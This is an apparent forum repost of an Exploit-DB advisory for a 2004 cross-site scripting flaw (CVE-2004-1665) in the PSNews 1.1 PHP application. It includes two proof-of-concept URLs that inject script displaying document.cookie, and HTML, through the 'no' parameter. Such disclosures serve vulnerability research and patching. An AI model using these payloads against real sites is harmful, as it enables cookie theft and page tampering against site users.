- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 24575
- Проверка EDB
-
- Пройдено
- Автор
- MICHAL BLASZCZAK
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2004-1665
- Дата публикации
- 2004-09-05
PSNews 1.1 - 'No' Cross-Site Scripting
Код:
source: https://www.securityfocus.com/bid/11124/info
PSNews is a Web application that is implemented in PHP.
PSNews is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input.
This vulnerability is reported to exist in version 1.1 of PSNews.
http://www.example.com/index.php?function=show_all&no=%253cscript>alert%2528document.cookie);%253c/script>
http://www.example.com/index.php?function=add_kom&no=">%20<font%20size="20"%20color=red>%20<b>%20WackY%20%20</font>- Источник
- www.exploit-db.com
